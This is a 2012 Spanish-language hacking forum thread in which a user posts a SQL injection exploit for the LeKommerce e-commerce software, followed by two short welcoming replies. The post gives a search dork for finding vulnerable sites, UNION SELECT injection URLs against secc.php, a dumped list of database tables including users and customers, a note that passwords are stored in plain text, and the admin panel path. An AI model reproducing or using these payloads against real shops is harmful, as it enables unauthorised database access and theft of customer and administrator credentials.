comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Exploit SQLI LeKommerce

  • 2 Respuestas
  • 1806 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado MaztoR

  • *
  • Underc0der
  • Mensajes: 56
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • MaztoR [IN]-Security
    • Email
  • Skype: Maztor-
« en: Abril 05, 2012, 09:25:16 pm »


Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
# Author: Mazt0r
# Exploit Title: Online Shop SQLI
# Date: 04 DE MARZO DE 2012
# software: LeKommerce
# link: http://www.lekommerce.com/
# Version: "ESPECIFIC VERSION NO TESTED"
# Category: Commerce online
# Tested on: Linux

D0rk: inurl:secc.php?id=

=====================================
Exploit :
======================
http://localhost/path/secc.php?id={sqli}
======================
Example:
======================
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables--
======================
dbs:
======================
+--------------------------------+
| t_clientes |
| t_colores |
| t_colores_idiomas |
| t_configuracionglobal |
| t_emailing |
| t_emailingcliente |
| t_facturascompra |
| t_facturasventa |
| t_familias |
| t_familias_idiomas |
| t_formaspago |
| t_idiomas |
| t_incidencias |
| t_iva |
| t_marcas |
| t_menusuperior |
| t_noticias |
| t_productos |
| t_productos_idiomas |
| t_proveedores |
| t_provincias |
| t_rel_productos_tallas_colores |
| t_rel_tallas_colores |
| t_seccionesproductos |
| t_seccionesproductos_idiomas |
| t_series |
| t_subfamilias |
| t_subfamilias_idiomas |
| t_tallas |
| t_tallas_idiomas |
| t_tiposperfiles |
| t_traducciones |
| t_usuarios |
+--------------------------------+

PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC!

----------------------------------
PANEL ADMIN: [/lib/validar_index.php]
----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------



LINKS EXPLOIT REPORTS
-----------------------------------------

OSDVB:No tienes permisos para ver links. Registrate o Entra con tu cuenta
EXPLOIT DB: No tienes permisos para ver links. Registrate o Entra con tu cuenta
PACKET-STORM:No tienes permisos para ver links. Registrate o Entra con tu cuenta
SECUNIA: No tienes permisos para ver links. Registrate o Entra con tu cuenta
« Última modificación: Abril 05, 2012, 10:37:30 pm por MaztoR »
-------------------------------------
| Twitter: @Mazt0r                
| Site: No tienes permisos para ver links. Registrate o Entra con tu cuenta        
| Skype: Maztor-                    
-------------------------------------

Desconectado 54NDR4

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
  • Mis Besos desencriptadores ven tu Codigo Fuente ♥
    • Ver Perfil
    • Email
« Respuesta #1 en: Abril 05, 2012, 09:31:46 pm »
Bienvenido y que bueno que estes activo en el foro nuevamente  :)


besos  :-*

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #2 en: Abril 06, 2012, 08:17:36 am »
Re-Bienvenido Mazt0r, buen aporte.

Un saludo.
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

 

¿Te gustó el post? COMPARTILO!



SQLI tutorial pour débutants ( newbie) ecrite par *..::Key-m0rt::..*

Iniciado por ..::key-m0rt::..

Respuestas: 0
Vistas: 1708
Último mensaje Marzo 23, 2010, 12:38:21 pm
por ..::key-m0rt::..
[Video] Jugando al JuAckEr pt 1. [No es tutorial][SQLi+Deface]

Iniciado por Xt3mP

Respuestas: 0
Vistas: 1501
Último mensaje Julio 21, 2010, 07:43:44 pm
por Xt3mP
LFI+SQLI [Incluyendo ficheros a travez de valores enteros]

Iniciado por q3rv0

Respuestas: 4
Vistas: 1728
Último mensaje Julio 24, 2013, 01:43:36 pm
por M5f3r0
Blind SQLi Boolean Based mysql

Iniciado por arthusu

Respuestas: 2
Vistas: 2066
Último mensaje Mayo 26, 2013, 04:01:07 pm
por WARsec
Métodos para bypassear un WAF en Inyección SQLi

Iniciado por M5f3r0

Respuestas: 6
Vistas: 3110
Último mensaje Agosto 05, 2013, 01:24:32 pm
por Mr. Foster